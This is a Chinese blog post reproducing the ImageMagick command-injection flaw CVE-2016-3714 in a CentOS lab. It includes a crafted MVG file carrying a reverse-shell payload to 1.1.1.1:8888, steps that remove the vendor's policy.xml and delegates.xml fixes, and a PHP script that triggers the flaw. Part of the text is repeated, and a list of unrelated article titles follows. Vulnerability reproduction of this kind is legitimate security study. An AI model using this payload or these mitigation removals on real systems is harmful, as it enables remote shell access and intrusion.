ImageMagick 漏洞复现之路
来源:互联网 发布:杭州月嫂哪家好 知乎 编辑:程序博客网 时间:2024/06/04 18:38
我的环境是centos7 ,php是PHP 5.4.16,ImageMagick是6.7.8-9正好在影响范围之内,但是官方还是对其官网上所有的安装包进行了修复,所以现在下载下来的任何版本的ImageMagick都是不存在漏洞的,
我们看看官方都是怎么修复的,并且还原漏洞现场
漏洞原理在:https://jiji262.github.io/wooyun_articles/drops/CVE-2016-3714%20-%20ImageMagick%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%86%E6%9E%90.html
首先安装ImageMagick:
参考:http://jingyan.baidu.com/article/91f5db1be6ded11c7f05e3d3.html
yum install ImageMagick
yum install ImageMagick-devel
yum install php-pear
yum -y install php-devel
yum install gcc
pecl install imagick (这个之内在php 5.3的版本以上才能安装成功)
echo extension=imagick.so >> /etc/php.ini (这个是将ImageMagick加载到php中)
这个时候我们vim test.mvg
我们看看官方都是怎么修复的,并且还原漏洞现场
漏洞原理在:https://jiji262.github.io/wooyun_articles/drops/CVE-2016-3714%20-%20ImageMagick%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%86%E6%9E%90.html
首先安装ImageMagick:
参考:http://jingyan.baidu.com/article/91f5db1be6ded11c7f05e3d3.html
yum install ImageMagick
yum install ImageMagick-devel
yum install php-pear
yum -y install php-devel
yum install gcc
pecl install imagick (这个之内在php 5.3的版本以上才能安装成功)
echo extension=imagick.so >> /etc/php.ini (这个是将ImageMagick加载到php中)
这个时候我们vim test.mvg
内容是:
push graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'pop graphic-context
保存,然后
converttest.mvg test.png
发现没有权限
我查看:
/etc/ImageMagick/policy.xml
发现在配置文件里面已经加入了修复配置:
<policymap> <policy domain="coder" rights="none" pattern="EPHEMERAL" /> <policy domain="coder" rights="none" pattern="URL" /> <policy domain="coder" rights="none" pattern="HTTPS" /> <policy domain="coder" rights="none" pattern="MVG" /> <policy domain="coder" rights="none" pattern="MSL" /></policymap>
我删掉这些
然后再运行一下,依然不成功,我继续查看:/etc/ImageMagick/delegates.xml
查找https
发现:
修复前配置文件的https部分:
<delegatedecode="https" command=""curl" -s -k-o "%o" "https:%M""/>
修复后:
<delegatedecode="https" command=""curl" -s -k-o "%o" "https:%F""/>
红色部分就是官方修复的位置
将配置文件修改之后:
converttest.mvg test.png
成功出发漏洞,反弹一个shell回本机
写一个php文件来证明这个漏洞:
<?php$thu= new Imagick();$thu->readImage('test.mvg');$thu->writeImage('KKKK.png');$thu->clear();$thu->destroy();unlink("KKKK.png");?>
用phptest.php来执行一下
成功触发,并且反弹
0 0
- ImageMagick 漏洞复现之路
- MS08-067漏洞复现
- 方程式 Eternalblue 漏洞利用复现
- ImageMagick漏洞演示
- wordpress ImageMagick漏洞
- ImageMagick 命令执行漏洞
- ImageMagick被爆高危漏洞
- Cisco SNMP RCE漏洞复现过程
- 针对MS08-067漏洞的复现
- Android本地拒绝服务漏洞学习与复现
- Seacms漏洞分析利用复现 By Assassin
- MS Office 漏洞CVE-2017-8759复现
- Iis7.0 cgi解析漏洞复现
- ImageMagick爆高危命令执行漏洞
- ImageMagick popen_utf8 命令注入漏洞分析报告
- ImageMagick远程代码执行漏洞分析
- [Mobile Security] - CVE漏洞复现虚拟团队呼唤小伙伴
- WebView远程代码执行漏洞学习并复现
- R树空间索引
- 项目管理之如何控制项目进度和质量
- android6.0 Scrollview嵌套RecyclerView position始终为0
- Java 解決BufferedReader读取UTF-8文件中文乱码
- 模仿模仿微信收到新的信息时,图标里有小原点
- ImageMagick 漏洞复现之路
- android之ConnectivityManager简介,网络连接状态
- Ubuntu:安装常用软件找不到安装包时的解决办法
- Java集合Set、List、Map的遍历方法
- android 飘心动画(直播点赞)效果(二)---贝塞尔曲线的实现
- MVP模式
- POJ 1741 Tree 点分治
- visual studio 调试
- Class定义和用法